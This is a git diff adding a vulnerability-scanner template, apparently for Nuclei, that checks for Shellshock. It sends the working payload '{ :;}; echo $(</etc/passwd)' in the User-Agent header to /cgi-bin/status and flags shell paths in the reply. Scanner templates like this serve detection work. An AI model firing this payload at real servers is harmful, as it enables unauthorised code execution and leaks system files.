diff --git a/vulnerabilities/rce-shellshock-user-agent.yaml b/vulnerabilities/rce-shellshock-user-agent.yaml
new file mode 100644
index 0000000000..2761bd93a0
--- /dev/null
+++ b/vulnerabilities/rce-shellshock-user-agent.yaml
@@ -0,0 +1,19 @@
+id: rce-user-agent-shell-shock
+
+info:
+ name: Remote Code Execution Via (User-Agent)
+ author: 0xelkomy
+ severity: high
+
+requests:
+ - method: GET
+   headers:
+    User-Agent: "{ :;}; echo $(</etc/passwd)"
+   path:
+    - "{{BaseURL}}/cgi-bin/status"
+   matchers:
+    - type: word
+      words:
+       - "/bin/sh"
+       - "/bin/bash"
+      part: body